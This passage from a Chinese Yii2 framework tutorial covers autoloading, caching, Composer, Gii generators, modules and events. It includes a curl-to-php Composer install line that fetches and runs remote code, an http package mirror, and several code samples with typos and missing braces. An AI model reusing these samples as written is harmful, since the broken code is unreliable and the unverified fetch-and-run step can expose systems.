namespace classes;

class C2 {}
```

- index.php

``` php
function my_require( $class ) {
	require( $class.'.php' ) ;
}

spl_autoload_register( 'my_require' );

$condition = $_GET[ 'key' ] == 0
  ? true : false ;

if( $condition ) {
	$c1 = new C1;
} else {
	$c2 = new C2;
}
```

上面的例子中，index.php 的 if ... else 语句中，当实例化类 C1 的时候，发现当前脚本中并没有类 C1 存 在，因此，就会自动触发并执行 sql_autoload_register()，并通过该方法找到函数 my_require()，并把需 要的类名 C1 作为 my_require() 的参数然后调用该函数，该函数执行结束之后，所需的类文件已经被包含到当前脚本，程序便可正常运行。

Yii 中自动加载 spl_autoload_register() 函数的地方在 basic/vendor/Yiiisoft/Yii2/Yii.php 文件中，该文件 在入口脚本 basic/web/index.php 中被包含到 Yii 中，Yii.php 的源码如下：

``` php
class Yii extends \Yii\BaseYii
{
}
spl_autoload_register(['Yii', 'autoload'], true, true);
Yii::$classMap  = require(__DIR__ . '/classes.php');
Yii::$container = new Yii\di\Container();
```

这里 spl_autoload_register() 的意思是当 Yii 中有程序找不到类文件的时候，就会自动执行 Yii 类中的 autoload 方法去尝试解决问题。而 autoload() 方法是 Yii 类的父类 \Yii\BaseYii 的方法。

#### 类的映射表机制

class map 能够进一步加快类的延迟加载速度。

上面已经说了 Yii 当实例化对象的时候如果找不到类文件就会自动调用 `autoload( $class )` 方法，其中 `$class` 代表的是所需类的全名-命名空间。

那么 autoload() 是如何自动找到类所在的绝对路径的呢?

`\Yii::$classMap` 是 Yii 中的全局类中的一个数组，里面保存的就是经常调用的类文件。该数组的键是类的 命名空间，值是类文件在磁盘上的实际物理路径，即是在数组 `$classMap` 中保存的就是 autoload() 方法在 查找类文件的时候会搜索的类的映射表信息。

如果这些映射关系不正确，那么程序依然会报错。比如：

``` php
use app\models\Test;
\Yii::$classMap[ 'app\models\Test' ] = 'C:\dev\apache\basic\moddddels\Test.php' ;
$test = new Test() ;
```

因为不存在 moddddels 文件夹，所以在执行该处代码的时候 Yii 会抛出一个异常。

需要注意的是，在类的映射表中保存的都是常用的类，而不能把很多不常用的类保存进去，因为这样会减慢类的搜索速度使 Yii 性能降低。

#### 组件的延迟加载

除了类可以延迟加载外，在 Yii 中，应用组件也可以延迟加载。

说简单点就是，当 Yii 应用主体 `$app` 被实例化出来之后，会自动加载很多应用组件，即保存在 basic/config/web.php 中的 components 数组当中的。

比如 cookie，session，request 等，然后把对这些组件的请求交给控制器处理。

但是，这个自动加载过程不是马上完成的，而是当控制器中需要用到某个组件的时候 `$app` 才会去加载相应的组件。举例说明，在控制器中只有执行类似 `$session = \Yii::$app->session;` 这样的代码后，才会触 发 `__get()` 方法去加载相应的组件。

### 页面（片段）缓存

页面中不会经常发生变动的区域可以缓存起来，比如商品分类信息一般很少变动就可以把页面中的商品分类片段缓存起来，当下次请求页面的时候，页面中的商品分类信息就不会再从数据库中取出来而是从缓存中取。

#### 片段缓存

在视图文件 index.php 中使用缓存举例：

``` php
<?php
$duration = 15 ; // 缓存时间单位是秒
$dependency = [
	'class'    => 'Yii\caching\FileDependency',
  	'fileName' => 'test.txt'
];
// 缓存开关
$is_enable = false ;
// 缓存有效期设置
// if( $this->beginCache( 'cache_id' , [ 'duration' => $duration ]) ) {
# 缓存依赖设置
// if( $this->beginCache( 'cache_id' , [ 'dependency' => $dependency ]) ) {
# 缓存开启与否
if( $this->beginCache( 'cache_id' , [ 'enabled' => $is_enable ]) ) {
?>

  <div id="cache_id">Cached Content</div>
<?php
  	$this->endCache();
}
?>
  
	<div id="non_cache_id">Not Cache Content</div>
```

上面的 `$this` 代表的就是视图组件。

##### 关于片段缓存嵌套

片段缓存嵌套中，内层缓存会受到外层缓存的制约。

``` html
<?php
	if( $this->beginCache('outer_cache_id' , ['duration' => 10 ])) {
?>

<div id="outer_cache_id">Outer Cached Content

<?php
	if($this->beginCache('inner_cache_id' , ['duration' => 1])) {
?>

<div id="inner_cache_id">Inner Cached Content</div>
  
<?php
      $this->endCache() ;
      }
?>
</div>
<?php
	$this->endCache() ;
}
?>
```

在上面这个例子中，外层缓存失效时间是 10 秒，内层缓存失效时间是 1 秒。

当 1~10 秒内内层缓存的内容发送变化时，并不会马上刷新到浏览器，而是要等到外层缓存失效后，即 10 秒后，内层发生的变化才能被看见。

#### 页面缓存

如果整个页面的内容都不怎么变化时可以把整个页面都缓存起来。

Yii 中缓存页面是通过 behaviors 方法，即行为机制( Yii 的 mixin 机制也借助了该方法 )，来实现的。效果是如果控制器中如果有 behaviors() 方法，那么不论浏览器端请求执行的是那个方法，behaviors() 会先于控制器中其他任何方法被执行。

可以通过 behaviors() 方法来告诉 Yii 框架当有请求访问操作的时候把操作结果缓存到页面缓存中。behaviors() 如何告诉 Yii 框架的呢？

behaviors() 方法的返回值是一个数组，可以在数组中定义一些配置，然后通过该返回值告诉控制器使用页面缓存。举例说明：

``` php
namespace app\controllers;
use Yii\web\Controller;

class TestController extends Controller
{
  public function behaviors() {
	return [
      [
        'class' => 'Yii\filters\PageCache' ,
        'only'  => [ 'index', 'test' ] ,
        'duration'   => 1024 ,
        'dependency' => [
          'class'    => 'Yii\caching\FileDependency' ,
          'fileName' => 'test.txt'
        ]
      ]
    ];
  }
  public funtion actionIndex() {
    echo 'this is a test demo, in most applications, do not `echo` anything here but invoke the `render()` function to display the views.' ;
    // $this -> render( 'index' ) ;
  }
  public function actionTest() {
  	echo 'this is a comparison to the action `index`. If you want to cache this content by using `behaviors()`, just add this action name `test` to be one value of key `only`, which is an array. By default, without `only` filed, `behaviors()` will cache all the content of each aciton in this controller file, so you should specify which action is need to cache or not by configure the `only` key in return array.' ;
  }
}
```

**总结：**页面缓存是通过 配置 behaviors() 方法的返回值来实现的，通过 behaviors() 可以缓存很多片段和页面，但当在控制器中调用 render() 方法显示视图的时候，就可以通过配置 behaviors() 的返回值来决定是否需要缓存页面。

### HTTP 缓存

- HTTP 缓存所在位置是在浏览器端的。


- 服务器是如何告诉浏览器什么时候使用 HTTP 缓存的？

通过在响应头中设置 Cache-Control 字段为开启。

#### lastModified

该字段中的值代表着服务器端的资源的最后修改时间。用于和缓存在浏览器端的相同资源的最后修改时间相对比，如果服务器端的最后修改时间大于浏览器端已请求过的同一资源的最后修改时间的话，那么当浏览器再次向服务器发出对该资源的请求的时候，服务器就会将最新的资源返回给浏览器，而当服务器上资源的 lastModified 值小于或等于浏览器端的 lastModified 值，当同样的请求到来时，服务器会返回给浏览器一个 304 状态码，代表服务器上的数据和保存在浏览器中的 HTTP 缓存是一样的，让浏览器直接使用客户端本地的 HTTP 缓存。

Yii 中 HTTP 缓存使用举例：

- /path/to/basic/controllers/HttpController.php

``` php
namespace app\controllers;
use Yii\web\Controller;

class HttpController extends Controller
{
  public function behaviors() {
	return [[
      'class' => 'Yii\filters\HttpCache' ,
      'lastModified' => function() {
			return time() - 1024 ;
      }
	]];
    
  public function actionIndex() {
	  return $this->render('index');
  }
}
```

- /path/to/basic/views/http/index.php

``` html
<div>
  <div>
	<h2>this is the http cache demo.</h2>
	<h3>you can not see me unless you correct the timestamp right.</h3>
  </div>
</div>
```

可以通过修改 lastModified 的值去测试 index.php中的文件是否发生了变化。当然了，index.php 在修改 lastModified 值的前后需要不一样才能看到效果。

#### etagSeed

lastModified 字段用于判断资源最后修改时间上是否不同从而决定是否返回 304，而 etagSeed 字段则用于判断资源的内容是否改动而决定是否返回 304。最后修改时间不一样不代表资源的内容不一样。但是服务器的判断是有顺序的：

- 先判断 lastModified 是否一样，如果一样，那么服务器直 接返回 304 让浏览器直接从缓存中取数据。
- 如果不一样的话，才判断 etag 的值来决定是否返回 304。


举例说明，只需修改 HttpController.php 中的部分代码如下:

``` php
public function behaviors() {
  return [
	[
		'class' => 'Yii\filters\HttpCache' ,
      	'lastModified' => function() {
			return time() - 1024;
	      },
		'etagSeed' => function() {
          return 'test';
		}
    ]
];}
```

可以通过修改 etagSeed 的值去测试浏览器是否是从缓存中取数据了。

需要注意的是，实际的应用过程中，不会像上面那样直接返回一个固定的值给 lastModified和 etagSeed，而是通过不同的业务逻辑去决定返回值，否则它们的设置没有多大意义。

#### Yii HTTP 缓存示例

- /path/to/basic/controllers/HttpController.php

``` php
namespace app\controllers;
use Yii\web\Controller;

class HttpController extends Controller
{
  public function behaviors() {
    return [[
     	'class' => 'Yii\filters\HttpCache',
      	'lastModified' => function() {
			return filemtime( 'C:\__SHARE__\test.txt' ) ;
			// return time() + 1024 ;
        },
		'etagSeed' => function() {
			$fp = fopen( 'C:\__SHARE__\test.txt', 'r' ) ;
          	$test_content = fgets( $fp ) ;
			fclose( $fp ) ;
			return $test_content;
    	}
	]];
    
    public function actionIndex() {
      $filename = 'C:\__SHARE__\test.txt' ;
      $content = file_get_contents( $filename ) ;
      return $this -> render( 'index', [ 'info' => $content ] ) ;
    }
  }
```

- /path/to/basic/views/http/index

``` html
<?=$info?>
```

- C:\__SHARE__\test.txt

``` html
第一行被监听，如果被修改，则返回本文件的最新内容。 第一行之外的内容没有被 fgets() 函数读取到。 所以正常情况下我被修改你也看不到变化，所以别动我动第一行吧。
```

 在浏览器上的输出为 test.txt 中的内容。

可以测试，如果改动了 test.txt 中第一行的文本信息，那么刷新浏览器端会马上看到最新内容，而修改其他行的信息，刷新浏览器还是显示上一次的信息，因此根据程序中 etagSeed 的设置，只要第一行不改变就会让浏览器直接从缓存中取数据。

## 工具

### Composer

Composer 是 PHP/Yii 用来管理软件包依赖关系的工具。Composer 下载软件包的来源有：Packagist.org、GitHub。

其中 Packagist.org 中描述的是位于 GitHub 上各种软件包之间的依赖关系，而 GitHub 上仅仅只是托管着成千上万的软件包，而不含各种软件包之间的依赖关系。

Composer 在项目中的运行流程大致是：先到 Packagist.org 上面查找项目所需的软件包之间的 依赖关系，或者所依赖的软件包的下载地址，然后到 GitHub 上面下载所需的软件包安装到项目中。

总之，Composer 将帮助我们下载我们所需要的，位于 Packagist.org 上的 Package 元数据和位于 GitHub 之上的软件源码压缩包到我们的项目以供使用。

#### 下载安装

``` shell
# Windows
https://getcomposer.org/Composer-Setup.exe

# Linux/Mac OS X
curl -sS https://getcomposer.org/installer | php
# Or
php -r "readfile('https://getcomposer.org/installer');" | php

# 直接下载
https://getcomposer.org/download/1.0.0-alpha11/composer.phar
```

#### 使用 Composer 下载所需软件包

到 Packagist.org 搜索所需软件包，比如 Yiisoft/Yii2-gii。

在搜索结果中可以看到 Yii2-gii 和它所需的依赖包，和依赖的依赖包的下载地址，以及对应的历史版本。

在 Yii2 项目的根目录中执行：

``` shell
cd /path/to/Yii/basic
php /path/to/composer.phar require Yiisoft/Yii2-gii 2.0.4
```

该命令结束之后，默认在 basic/vendor 文件夹中就会出现下载好的 Yii2-gii 以及所有依赖的软件包。

gii 只是运行 Yii2 的所需依赖包之一。也可以直接运行 `php ../composer.phar install`，这将为我 们下载所有与 Yii2 运行相关的所有依赖包都下载到 basic/vendar 目录下。

#### composer.json

Composer 在下载软件依赖的时候会按层读取 composer.json 文件，上面的命令之所以会把 Yii2 框架所有的依赖下载到本地是因为在 composer.json 已经配置好了，所以在命令中我们并没有显 式地指定要下载哪些软件包。在 composer.json 中配置的依赖信息和在 Packagist.org 上面 require 和 require(dev) 中列举的 依赖相同，但之所以不到 Packagist.org 上去读取依赖信息一是因为国内访问该网站很慢，同时 读取网站上的清单的方式并不能自定义想要下载的某个具体的依赖包，因此 composer 的下载多 采用按层读取 composer.json 的方式。

#### 使用 Composer 首次下载 Yii2 基础框架

在 packagist.org 网站上搜索 Yiisoft/Yii2-app-basic 可以看到 Yii2 基础框架的相关信息，以及在 GitHub 上的地址。在没有 composer.json 的情况下如果想要下载 Yii2 的框架源码，可以使用 create-project 命令：

``` shell
php composer.phar global require "fxp/composer-asset-plugin:~1.0.0"
php composer.phar create-project Yiisoft/Yii2-app-basic basic
```

之所以需要第一条命令是因为 composer 在下载非 php 软件包的时候有可能会出错，比如在安装 JQuery 等前端框架的时候可能安装失败，因此需要先安装 fxp 资源管理插件来帮助安装非 php 软件包。更详细的安装过程可以在 GitHub [项目主页](https://github.com/Yiisoft/Yii2-app-basic) 中查看。

#### 使用 composer 全量镜像加速软件下载

- 通过命令

``` shell
composer config -g repositories.packagist composer
http://packagist.phpcomposer.com

# Or
php ../composer.phar config -g repositories.packagist composer
http://packagist.phpcomposer.com
```

- 直接修改配置文件

以 Yii 框架为例，在 Yii 的根目录下的 composer.json 中行末之前添加以下键值对：

``` json
"repositories": [
	{"type": "composer", "url": "http://packagist.phpcomposer.com"},
  	{"packagist": false}
]
```

这样就完成了国内镜像的配置而禁用了从 packagist 获取软件包。

### Debug 工具 Debugger

Yii 2 已经提供了默认一个 debug 工具，可以通过访问 `http://localhost/path/to/basic/web/index.php?r=debug` 进入。

当然也可以通过 composer 安装 Yii 的 Debug 工具。

#### Debugger 定位

服务器端接受用户传递过来的输入时保存的位置主要有变量 `$_GET`、`$_POST`、`$_SERVER` 等预定义超全局数组中，以及 `$_FILE`，或者是保存在 Session 文件，或者是保存到/查询 数据库。

可以在 Yii Debugger 中点击某个具体的 tag 查看数据来去的的详细信息。

#### Debugger 性能检测

性能检测主要可以从以下 2 点去分析：

- 数据库查询操作执行时间：注意 Duration 的值。
- Performance Profiling：检测某个程序片段的运行时间。

``` php
\Yii::beginProfile( 'test' );
echo 'test' ;
sleep( 1 ) ;
\Yii::endProfile( 'test' );
```

这样就可以在 Yii Debugger 中查看到 beginProfile 和 endProfile 之间的程序片段的执行时间。

通过观察 Duration 的值的大小可以针对性地优化代码。

### GII

Gii 是可以为项目贡献代码的工具，通过工具自动化可以提升开发效率。

Gii 可以生成如下代码生成器 (Generator)：Model / CRUD / Controller / Form / Module /Extension 。

#### Gii 活动记录对象的应用场景

所谓的应用场景，就是同一个操作在不同的场景下会产生不同的结果。

以对数据库 CRUD 操作为例说明：

数据准备：表 test。使用 Yii 对数据库表 test 的操作，首先要创建一个 Test 活动对象，专门用户对表 test 的各种操作和管理。

- /path/to/basic/models/Test.php

``` php
class Test extends \Yii\db\ActiveRecord
{
  public static function tableName() {
    return 'test';
  }
  public function scenarios() {
      // 定义活动对象会使用到的场景
    return [
      'scenario1' => ['id', 'title'] // 场景 scenario1 代表关联 id 和 title 两个字
      'scenario2' => ['id' ]         // 场景 scenario2 代表关联 id 一个字段
	];
  }
}
```

- /path/to/basic/controllers/IndexController.php

``` php
namespace app\controllers ;
use Yii\web\Controller ;
user app\models\Test ;
class IndexController extends Controller
{ 
  public function actionIndex() {
    $test = new Test() ;
	// 指定场景
	$this -> scenario = 'scenario1' ;
    $test_data = [
		'data' => [ 'id' => 3, 'title' => 'hello' ]
    ];
	$test -> load( $test_data, 'data' ) ; // load() 的第一个参数是加载的数据; 第二个参数是指定加载的数据中的那个键所对应的数据
    echo $test -> id ;
    echo $test -> title ;
  }
}
```

根据场景的不同，控制器 Index 中输出的数据不同。当指定的是 scenario1 时输出 id 和 title 的值;当指定的是 scenario2 时只输出 id 的值。

场景对于 ActiveRecord 有什么用?

通过加载不同的场景，活动记录对象可以无差别地使用一个方法执行很多的操作，比如博客文章的新建和修改可以对应一个方法去操作，但是按两种场景去执行，所以得到的结果仍然是正确的。

#### Gii 之 数据表的 CRUD

进入代码生成器操作页面，选择 CRUD Generator，填入如下数据：

- Model Class

活动记录数据模型类，必须为全名，属于手动创建在此填入，比 如 `app\models\Test`。该活动记录类中内容就是上面例子中的内容。

- Search Model Class

也是数据模型，和 Model Class 的不同之处在于 app\models\TestSearch 会被 Gii CRUD 生成器自动生成。通过该类生成中的方法可以直接从 test 表中查找相应字段的数据。

- Controller Class

自动生成控制器，比如 app\controllers\TestController

- View Path

可以不填。不写的时候默认会在 views 文件夹中创建一个 Test 文件夹然后在里面创建 一些视图文件。

- Base Controller Class

Yii\web\Controller 默认不用修改。

- Widget Used in Index Page：保持默认。
-  Code Template：保持默认。

生成成功后，可以通过 http://localhost/path/to/basic/web/index.php?r=test 访问刚刚创建的 Test 控制器。

在控制器首页就可以进行对表 test 进行所有的 CRUD 操作了。需要注意的是，如果不指定场景，在 create 数据的时候会失败。解决办法只需在 Test 控制器中，通过活动记录实例对象的为成员属性 scenario 赋值一个在活动记录类中定义好的场 景就可以了，比如 `$model -> sceneraio = 'scenario1;'` ，这和上面的的例子是一样的。

##### 容易犯错的地方

在活动记录中定义的 scenarios 方法名一定要有 `s`，而在访问场景属性的时候却要写成 scenario。

可以看出，通过 Gii 的 CRUD Generator，最关键的就只需手动创建一个活动记录类并填写其所在位置就可以为我们自动生成对该活动记录类所管理的表 test 的所有 CRUD 操 作了。确实十分快速方便。

#### Gii 之 widget

所谓的 widget 即是在多个 Web 页面中重复使用的元素可以封装成一个独立的小部件，等待着需要显示的页面去调用，这些小部件就是 widget。

举例说明，安装 Yii 框架的规定编写一个顶层菜单的小部件：

- TopMenu.php

``` php
namespace app\components ;
use Yii\base\Widget ;
class TopMenu extends Widget
{
  public function init() {
	parent::init() ;
	echo '<ul>' ;
  }
  public function run() {
    return '</ul>' ;
  }
  public function addMenu( $menuName ) {
    return '<li>'.$menuName.'</li>';
  }
}
```

**注意：**TopMenu.php 放在 basic/components/ 路径下，而 components 文件夹默认没有需要手动创建。

- IndexController.php

``` php
namespace app\controllers;
use Yii\web\Controller;
use app\models\Test;
class IndexController extends Controller
{
  public function actionIndex() {
	return $this->renderPartial('index');
  }
  public function actionMenu() {
    return $this->renderPartial('menu');
  }
}
```

- menu.php

``` html
<?php
use app\components\TopMenu ;
?>

<div>
<?php $menu = TopMenu::begin();?>
<!-- 第一种写法: <?php //$menu -> addMenu(); ?> -->
<?=$menu->addMenu( 'menu1' );?>
<?=$menu->addMenu( 'menu2' );?>
<li>MENU3</li>
<?php TopMenu::end();?> <!-- end() 会调用 run(), 并打印 run() 的返回值 -->
</div>
```

然后访问 `http://localhost/path/to/basic/web/index.php?r=index/menu` 浏览器就会输出：

```
menu1
menu2
MENU3
```

#### Gii 之表单生成器

顾名思义，表单生成器会为我们自动生成一个活动表单。

点击 Form Generator，填写如下配置：

- View Name：灵活填写，代表的是表单显示的视图文件是哪个。应该类似于 article/publish。
- Model Class：代表数据模型中的活动记录类，管理表 test 这种类型。应该类似于 app\models\Test。
- Scenario：这里需要写你在活动记录模型中定义过的场景名。比如:scenario1。 
- View Path：保持默认。
- Code Template：保持默认。

生成成功之后，会提示你把如下代码粘贴到想要调用新建的视图的控制器类当中。

``` php
{
  $model = new app\models\Test(['scenario' => 'scenario1']);
  if ($model->load(Yii::$app->request->post())) {
    if ($model->validate()) {
      // form inputs are valid, do something here
      return;
    }
  }
  return $this->render('publish', [
    'model' => $model,
  ]);
}
```

可以不用管这个提示，继续下一步。选择一个调用 aritcle/publish 这个视图的控制器，以 IndexController.php 举例，在 Index 控制器中新增方法如下：

``` php
namespace app\controllers ;
use Yii\web\Controller ;
use app\models\Test ;
class IndexController extends Controller
{
  public function actionIndex() {
	return $this->renderPartial('index');
  }
  public function actionMenu() {
    return $this->renderPartial('menu');
  }
  public function actionPublish() {
  	$model = new Test;
	return $this->renderPartial('/article/publish', [
      'model' => $model
    ]);
  }
}
```

然后就可通过访问 `http://localhost/path/to/basic/web/index.php?r=index/publish` 看到刚刚创建的表单了。样式几乎没有，但是可以在以后添加 CSS / JS 等前端代码将其美化。

这里需要注意的是，在 GII 自动生成的 article/publish 视图中：

``` php
<?php
use Yii\helpers\Html;
use Yii\widgets\ActiveForm;

/* @var $this Yii\web\View */
/* @var $model app\models\Test */
/* @var $form ActiveForm */
?>

<div class="article-publish">
<?php $form = ActiveForm::begin(); ?>
<?= $form->field($model, 'id') ?>
  <?= $form->field($model, 'title') ?>
	<div class="form-group">
		<?= Html::submitButton('Submit', ['class' => 'btn btn-primary']) ?>
	</div>
<?php ActiveForm::end(); ?>
</div> <!-- article-publish -->
```

可见，field() 方法需要一个参数 `$model`，而根据注释，`$model` 应是 Test 的一个实例，因此在控制器中需要实例化 Test 类然后通过 renderPartial() 的第二个参数传递给视图。否则 Yii 会报错。

## 扩展

程序／框架的扩展性将会影响到程序后期的功能是否能够很容易地区延伸，以适应未来的变化和发展。针对提高程序扩展性，很多方式和设计模式逐渐被设计出来。

Yii 框架中提高程序扩展性的实现由如下四个方面：

### 模块化

把大项目划分为若干的小模块，通过模块间的配合完成系统任务。扩展 Yii 项目功能完全可以通过增加模块的 方式去实现。

#### 如何将一个项目进行模块化设计？

一套博客系统大致分为几个模块和子模块。子模块逻辑比较复杂的仍然可以继续划分子模块。

很常见的做法是，每个父模块之下都会有一个配置文件，很多子模块的开启与关闭配置都会记录在配置文件中。父模块执行的时候都回去读取子模块的各种信息，来决定是否调用子模块。

这样当某个模块出现问题的时候需要暂时关闭子模块，当子模块修复完毕之后再重新开启，才能够被父模块调用。

#### Yii 如何进行模块化设计?

通过 Gii 的 Module Generator，模块类由 GII 自动生成。

- Module Class

模块类所在的文件夹，类名大写，整个填写内容由命名空间+类名组成。

比如：app\modules\Article。

但是这样写有不足之处，假如同一个父模块下有很多子模块，GII 通过上面的填写方式自动会把所有的子模块生成在同一个文件夹下，并且公用同一个控制器和视图，这样违背了低耦合的原则，所以在填写命名空间的时候，需要为不同的子模块再次分配到各自的文件夹下面。

这样，每个控制器和视图只完成一个子模块的业务，真正体现了模块化思想。

所以，Modeule Class 应该如：`app\modules\article\Article`。

当有一个子模块 comment 的时候，同理应该写成：`app\modules\comment\Comment`。

- Module ID

模块 ID 和 模块类名要保持一致，但不用大写。比如模块类名是 Article，那么 Module

ID 就是 article。

- Code Template：保持默认。

Yii 框架应用主体默认是没有 modules 文件夹（modules 文件夹下放的都是子模块），所以需要我们根据自己的业务需求去创建相应的模块。

当用 GII Module Generator 自动生成子模块的时候，子模块中也不会有 modules 文件夹，只有子模块需要再划分子模块的时候，父模块所在根路径下才会需要生成 modules 文件夹。

填写完成预览无误后点击 Generate 即可在 basic 目录下面生成 modules 文件夹，里面存放的都是父模块下的子模块，可以看见也是按文件夹分开组织的。Yii 中子模块的子模块也是全部按照 MVC 架 构组织的，不过默认子模块的 models 目录并没有，这个也需要根据业务需要时再去创建。

生成结束后，可以看到提示说 "To access the module, you need to add this to your application configuration:"，打开 basic/config/web.php，在数组 `$config` 中将提示中的配置信息添加到该数组 中保存。

然后就可以使用我们刚刚生成的模块了。调用模块的方式有两种：

- 通过父模块的某个控制器调用子模块

``` php
// basic/controllers/HelloController.php

namespace app\controllers ;
use Yii\web\Controller ;
class HelloController extends Controller
{
  public function actionIndex() {
    // 获取子模块
	$article = \Yii::$app -> getModule( 'article' ) ; // 调用子模块的操作
	$article -> runAction( 'default/index' );
  }
}
```

需要说明的是，通过 GII Modules Generator 自动生成的子模块控制器默认文件名是 DefaultController.php，里面的操作名默认是 actionIndex()，所以上面需要这么调用。为了方便测试，我们在子模块的操作中 echo 一些内容：

``` php
namespace app\modules\article\controllers;
use Yii\web\Controller;
class DefaultController extends Controller
{
  public function actionIndex()
  {
      echo 'hello article' ;
      //return $this->render('index');
  }
}
```

然后访问 `http://localhost/path/to/basic/web/index.php?r=hello/index` 即可看到子模块的控制器被调用了。

- 通过 URL 直接访问子模块控制器

第一种访问子模块的方式不免太绕，因为使用了父控制器去调用子控制器，我们可以在 URL 指定子控制器的所在路径直接访问，即：`http://localhost/path/to/basic/web/index.php?r=article/default/index`。

可以看到结果和上面是一模一样的，毕竟执行的都是同一个控制器。

如果还想在子模块的基础上继续划分子模块，基本思路和上面的是一样的，只需通过 Gii Modules Generator 自动生成，需要注意的是，在填写 Module Class 值的时候也需要将不同的模块分配到与类 名相同文件夹下独立管理。比如要在 article 模块下划分 category 子模块，Module Class 就应该写成 这样:app\modules\article\modules\category\Category，而 Module ID 还是只写模块名 :category 即可。

子模块的子模块创建完成之后，仍然需要将配置信息添加到配置文件。当然可以直接像上面那样直接添加到 basic/config/web.php，但更好的做法是将生成的配置信息添加到生成父模块的时候自动生成的配置文件当中。比如模块 article 的子模块的配置文件就是 article 文件夹下面的 Article.php 。

配置 件中应该类似如下：

``` php
namespace app\modules\article;
class Article extends \Yii\base\Module
{
	public $controllerNamespace = 'app\modules\article\controllers';
	public function init() {
		parent::init();
		$this->modules = [
			// paste the configuration generated by gii here
        ];
		// custom initialization code goes here
	}
}
```

子模块的配置信息就加入 `$this->modules` 数组中去就可以了。然后通过 URL 直接访问即可

```http
http://localhost/path/to/basic/web/index.php?r=article/category/defualt/index
```

可以看见，对子模块控制器的访问就只需从父模块名到子模块类的操作名。写法都是固定的。 

**总结：**子模块的配置信息要写到父模块所在路径下面的，与父模块类名同名的配置文件中。

#### 为什么说模块化设计提高了框架的扩展性？

有了模块化思想，如果想要在 Yii 框架上新增新功能，就只需以模块的形式添加到 Yii 框架，从而成为 Yii 的一部分而被调用。这对于 Yii 框架处理多变的需求来说是十分方便的。

### 事件机制

方便对代码进行解耦。

事件机制可以把主逻辑和次要的逻辑区分开，主逻辑中抛出一些事件给次要的逻辑去响应，可以把项目当中各个逻辑的耦合性解决掉，从而提高程序的扩展性。

Yii 框架本身就采用了事件机制，启动 Yii 的时候，在响应完成请求和利用控制器处理请求的过程中，应用主体都回去抛出很多事件，这些事件将被 Yii 框架里面的很多应用组件所接受到，然后做相应的处理。

扩展 Yii 项目功能完全可以通过为各种事件增加各种响应方法的方式去实现。

#### 扫描式

为某个对象准备一个数组，或者是数据库中的某张表，用以 接受/ 记录 对象 发生/抛出 的事件( 也可以把 事件当作对象 )。对于该数组，外部有很多对象会定时地 扫描/监听 该数组，如果该数组中有新事件对象插入，就采取相应的处理。

#### 绑定式

也为某个对象准备一个数组，但是该数组预先保存了很多对象可能会发生的事件。对于该对象来说，如果发生了预定义的事件，即触发了事件;对于外部对象来说，如果要对预定义的某个事件进行处理，就需要该对象和某个事件联系起来，即绑定事件。

绑定是预先的，触发是不确定的。当某个对象触发了某个事件，其他与该事件绑定过的对象就会对该触发进行相应的处理。

Yii 框架采取的是绑定式事件机制。举例说明：

- /path/to/basic/vendor/animal/Cat.php

``` php
namespace vendor\animal ;
use \yii\base\Component ; // 为了使用 Component 类中的 trigger() 方法 use \yii\base\Event ;
class MyEvent extends Event
{
  public $message ;
}

class Cat extends Component
{
  public function shout() {
	echo 'CAT: miao miao miao ~~~~<br>' ;
    $me = new MyEvent ;
    $me -> message = 'CAT: where the damn mouses? I am hungry now.<br>' ;
    $this -> trigger( 'miao', $me ) ; // miao 为注册的事件 id; trigger() 方法的第二个参数可 以将某个对象传递给监听了该事件的类方法
  }
}
```

- /path/to/basic/vendor/animal/Mouse.php

``` php
namespace vendor\animal ;
class Mouse
{
	public function run( $e ) {
      echo $e -> message ;     
      echo 'MOUSE: I got go... I got run...<br>' ;
    }
}
```

- /path/to/basic/vendor/animal/Dog.php

``` php
namespace vendor\animal ;
class Dog
{
	public function look () {
		echo 'DOG: Shut up , bitch cat.<br>' ;
    }
}
```

- /path/to/basic/controllers/AnimalController.php

``` php
use yii\web\Controller ;
use \yii\base\Event ;
use vendor\animal\Cat ;
use vendor\animal\Mouse ;
use vendor\animal\Dog ;
class AnimalController extends Controller
{
  public function actionIndex() {
    $cat = new Cat ;
    $cat2 = new Cat ;
    $mouse = new Mouse ;
    $dog = new Dog ;
    // $cat -> on( 'miao', [ $mouse, 'run' ] ) ;
    $cat -> on( 'miao', [ $dog, 'look' ] ) ;
    // $cat -> off ( 'miao', [ $dog, 'look' ] ) ;
    // on() 方法注册对事件的监听
    // off() 方法注销对事件的监听
	// 进行类级别的事件绑定, 这里为了让所有实例化该类 Cat 对象在执行 shout() 事件的时候都绑定 miao 事件, miao 事件需要被 trigger() 函数事先注册
    
    Event::on( Cat::className(), 'miao', [ $mouse, 'run' ] ) ;
    // 也可以不绑定 [ $mouse, 'run' ] 等对象的函数，而绑定给一个匿名函数
    // Event::on( Cat::className(), 'miao', function () {
    	// echo 'anonymous function is called.<br>' ;
    // } );
    $cat->shout();
    $cat2->shout();
  }
}
```

关于上面的代码需要说明的几点：

-  trigger()

  - trigger( $id, $obj ) 方法将对事件为 $id 的事件进行注册，只有注册过的事件才能绑定给某个对象的方法然后监听是否触发从而决定是否完成一些事。
  - trigger() 方法的第二个参数可以将某个对象传递给监听了该事件的类方法。
  - trigger() 方法位于命名空间 \yii\base\Component 中。

- on()

  - on() 方法将某个注册过的事件绑定到某个对象的方法上，使其监听某个事件并当事件触发的时候做 出相应的行为。

  - 可以在 on() 中指定参数以完成不同的事件绑定方式，可以一次绑定一个事件给某个方法，比如：`$cat -> on( 'miao', [ $dog, 'look' ] ) ;`

    。也可以进行类级别的事件批量绑定，比如在上面的例子中，为了让所有实例化类 Cat 的对象在执行 shout() 事件的时候都绑定 miao 事件，是这么使用 on() 方法的：

    `Event::on( Cat::className(), 'miao', [ $mouse, 'run' ] ) ;`，这样所有 Cat 类的对象都可以把事件 miao 绑定到对象 `$mouse` 的 run() 方法上。

    也可以将事件绑定给一个匿名函数而不是某个对象的成员方法：

    ``` php
    Event::on( Cat::className(), 'miao', function () {
      echo 'anonymous function is called.<br>' ;
    });
    ```

  - off()

    off() 方法将注销某个方法对某个事件的监听。比如不想要 Dog 类的对象 `$dog` 的 look() 方法监听 Cat 类的对象 `$cat` 的 miao 事件，就使用 off() 方法即可：`$cat->off('miao', [ $dog, 'look']);`

#### 应用主体中的事件机制

`\YII::$app` 在 YII 的入口程序 /path/to/web/index.php 中被创建。

``` php
// comment out the following two lines when deployed to production defined('YII_DEBUG') or define('YII_DEBUG', true); defined('YII_ENV') or define('YII_ENV', 'dev');
require(__DIR__ . '/../vendor/autoload.php'); require(__DIR__ . '/../vendor/yiisoft/yii2/Yii.php');
     
$config = require(__DIR__ . '/../config/web.php');
(new yii\web\Application($config))->run();
```

